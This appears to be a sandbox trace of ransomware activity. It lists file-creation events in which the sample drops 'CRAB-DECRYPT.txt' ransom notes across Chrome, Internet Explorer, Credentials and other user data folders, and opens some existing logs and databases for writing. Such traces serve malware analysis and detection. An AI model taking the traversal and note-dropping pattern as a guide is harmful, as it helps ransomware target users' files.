Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\IndexedDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Extension Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\EVWhitelist\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SwReporter\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\CrashReports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\MSHist012018031420180315\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\History.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\UsageLogs\addinutil.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\mmc.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\powershell_ise.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Event Viewer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\FeedsStore.feedsdb-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\3Y244KAF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\ASF6K8JF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\M2CKLQNS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\ZH5Q7INF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\FRMDATA64.DAT desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\KnownGameList.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InstallAgent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InstallAgent\Checkpoints\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DomainSuggestions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\0IPER52U\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\BZMP202C\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\EU700QP2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\YWTG9C16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\EmieSiteList\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\EmieUserList\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\EUPP\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\ie4uinit-UserConfig.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\IECompatData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\IEFlipAheadCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\imagestore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\imagestore\o2e7lod\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\imagestore\v2a1n8m\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Recovery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Recovery\Active\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Recovery\Last Active\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\TabRoaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-1055582590\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-13849261960\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-14780564560\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-14780564610\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-14780569370\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
